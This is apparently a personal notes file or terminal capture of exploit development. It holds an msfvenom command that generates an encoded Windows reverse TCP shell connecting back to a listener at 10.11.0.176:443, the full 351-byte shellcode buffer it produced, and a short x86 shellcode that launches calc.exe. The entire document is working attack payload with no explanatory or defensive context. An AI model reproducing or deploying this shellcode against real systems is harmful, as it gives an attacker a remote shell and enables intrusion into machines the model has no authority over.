ld@ld-Nettitude:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.176 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 
"\xdb\xd6\xd9\x74\x24\xf4\x5e\x29\xc9\xbf\xfd\x84\xf3\x36\xb1"
"\x52\x31\x7e\x17\x83\xc6\x04\x03\x83\x97\x11\xc3\x87\x70\x57"
"\x2c\x77\x81\x38\xa4\x92\xb0\x78\xd2\xd7\xe3\x48\x90\xb5\x0f"
"\x22\xf4\x2d\x9b\x46\xd1\x42\x2c\xec\x07\x6d\xad\x5d\x7b\xec"
"\x2d\x9c\xa8\xce\x0c\x6f\xbd\x0f\x48\x92\x4c\x5d\x01\xd8\xe3"
"\x71\x26\x94\x3f\xfa\x74\x38\x38\x1f\xcc\x3b\x69\x8e\x46\x62"
"\xa9\x31\x8a\x1e\xe0\x29\xcf\x1b\xba\xc2\x3b\xd7\x3d\x02\x72"
"\x18\x91\x6b\xba\xeb\xeb\xac\x7d\x14\x9e\xc4\x7d\xa9\x99\x13"
"\xff\x75\x2f\x87\xa7\xfe\x97\x63\x59\xd2\x4e\xe0\x55\x9f\x05"
"\xae\x79\x1e\xc9\xc5\x86\xab\xec\x09\x0f\xef\xca\x8d\x4b\xab"
"\x73\x94\x31\x1a\x8b\xc6\x99\xc3\x29\x8d\x34\x17\x40\xcc\x50"
"\xd4\x69\xee\xa0\x72\xf9\x9d\x92\xdd\x51\x09\x9f\x96\x7f\xce"
"\xe0\x8c\x38\x40\x1f\x2f\x39\x49\xe4\x7b\x69\xe1\xcd\x03\xe2"
"\xf1\xf2\xd1\xa5\xa1\x5c\x8a\x05\x11\x1d\x7a\xee\x7b\x92\xa5"
"\x0e\x84\x78\xce\xa5\x7f\xeb\xfb\x32\x7f\x5b\x93\x46\x7f\x9a"
"\xdf\xce\x99\xf6\x0f\x87\x32\x6f\xa9\x82\xc8\x0e\x36\x19\xb5"
"\x11\xbc\xae\x4a\xdf\x35\xda\x58\x88\xb5\x91\x02\x1f\xc9\x0f"
"\x2a\xc3\x58\xd4\xaa\x8a\x40\x43\xfd\xdb\xb7\x9a\x6b\xf6\xee"
"\x34\x89\x0b\x76\x7e\x09\xd0\x4b\x81\x90\x95\xf0\xa5\x82\x63"
"\xf8\xe1\xf6\x3b\xaf\xbf\xa0\xfd\x19\x0e\x1a\x54\xf5\xd8\xca"
"\x21\x35\xdb\x8c\x2d\x10\xad\x70\x9f\xcd\xe8\x8f\x10\x9a\xfc"
"\xe8\x4c\x3a\x02\x23\xd5\x4a\x49\x69\x7c\xc3\x14\xf8\x3c\x8e"
"\xa6\xd7\x03\xb7\x24\xdd\xfb\x4c\x34\x94\xfe\x09\xf2\x45\x73"
"\x01\x97\x69\x20\x22\xb2";



Win x86 Calc.exe

shellcode = "\x31\xC9"
shellcode += "\x51"
shellcode += "\x68\x63\x61\x6C\x63"
shellcode += "\x54"
shellcode += "\xB8\xC7\x93\xC2\x77"
shellcode += "\xFF\xD0"
